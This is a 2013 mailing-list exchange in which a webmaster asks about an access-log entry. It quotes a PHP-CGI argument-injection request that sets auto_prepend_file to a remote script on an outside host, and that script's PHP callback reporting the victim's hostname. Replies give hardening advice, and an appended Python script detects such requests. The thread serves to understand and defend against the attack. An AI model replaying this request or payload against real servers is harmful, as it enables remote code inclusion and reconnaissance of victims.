[OT] server log entry?

Thierry Douez th.douez at gmail.com
Fri May 24 13:18:34 EDT 2013


Hi Richard,

Thanks for your looong answer :)


2013/5/24 Richard Gaskin <ambassador at fourthworld.com>

> Thierry Douez wrote:
>
>> Here is the line:
>>
>> 193.107.17.36 ... "GET
>> /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://
>> gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
>>
>> The file ../rf/s.txt  contains:
>>
>> <?php file_get_contents('http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']);
>> exit(0);
>> ?>
>
>>
>> The IP points to the middle of nowhere in Russia.
>>
>> and finally I know nothing about php.
>>
> ...
>
>> If someone has a more precise answer, I'm still interested :)
>>
>
> I don't have anything more specific on that, but I find it interesting
> that it appears to have been successful (result code 200).
>

> On most Apache and auth logs you'll find a great many attempts at all
> sorts of exploits, and most fail simply because the file they're looking
> for isn't there, or has been adequately protected against such attacks.
>

Well, in this case, the URI is "/" which is accepted as my home page.
And here, it's only the parameters which are obscure to me.
Apparently nothing bad happened, but I was just trying to understand, to maybe
add some extra rules to my htaccess file.


> As a general rule I try to stay current with all server components (MySQL,
> PHP, any frameworks like Wordpress, Drupal, etc.), and most of the time
> staying current blocks malicious bots.
>

Nothing like that here.


> That said, security is an ongoing process of cat and mouse, and no matter
> how frequently system components are updated there's always some new
> exploit being devised and deployed.
>
> I don't know enough about Python or your system setup to suggest how to
> prevent that specific attack, but in general if you move your CGI engines
> outside of the public HTML folder, lock down permissions as tightly as
> practical, and religiously sanitize inputs you can greatly minimize such
> risks.
>

This is how I've organised my web pages and I didn't have any problems,
but still, I keep an eye on the log files.
By the way, 90% of the exploits on my site in one year were against
WordPress!


> One more thing in favor of LiveCode Server:  until LC really takes off we
> get a minor benefit from "security by obscurity" - that is, it simply isn't
> worth most attackers' time to target LC because it's seldom used on the Web.
>

Umm, with the community edition, I guess it's not going to be true
forever...
  "the price of fame" :)

Anyway, next week I'm going to an Open-Source-Linux exhibition in Paris;
I'll bring this piece of code and ask at the PHP stand!

Thanks again,

Thierry

------------------------------------------------
Thierry Douez - http://sunny-tdz.com
Maker of sunnYperl - sunnYmidi - sunnYmage
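
An added example, not part of the original message or the list's code: a Python check that flags access-log requests like the one quoted above, where the query string decodes to command-line style switches (`-n`, `-d name=value`) instead of ordinary `key=value` parameters. The log lines in `SAMPLE` are constructed (documentation IP addresses and example.com), and the function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log prefix: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# The two ini directives set by the request quoted in the thread.
WATCHED = ("allow_url_include", "auto_prepend_file")

def inspect_line(line):
    """Return a finding dict when the query string decodes to -x style switches, else None."""
    m = LOG_RE.match(line)
    if not m or "?" not in m["target"]:
        return None
    raw_query = m["target"].split("?", 1)[1]
    # CGI (RFC 3875) only treats a query as a command line when it has no
    # unencoded '=', which is why the logged request writes '=' as %3D.
    if "=" in raw_query:
        return None
    tokens = unquote_plus(raw_query).split()  # '+' separates the arguments
    if not tokens or not tokens[0].startswith("-"):
        return None
    directives = {}
    for i, tok in enumerate(tokens):
        if tok.startswith("-d"):  # -dname=value or -d name=value
            body = tok[2:] or (tokens[i + 1] if i + 1 < len(tokens) else "")
            name, _, value = body.partition("=")
            directives[name] = value
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "size": m["size"],
        "switches": [t for t in tokens if t.startswith("-")],
        "directives": directives,
        "watched": [d for d in WATCHED if d in directives],
    }

def scan(lines):
    """Findings for every suspicious line in an iterable of log lines."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines modelled on the quoted entry.
SAMPLE = [
    '203.0.113.7 - - [24/May/2013:13:18:34 -0400] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://example.com/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"',
    '203.0.113.8 - - [24/May/2013:13:19:02 -0400] "GET /?page=2&sort=asc HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

A 200 status on a finding only shows that the server answered the request for that path; comparing the logged size with the usual size of the same page helps judge whether the switches changed anything.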



More information about the use-livecode mailing list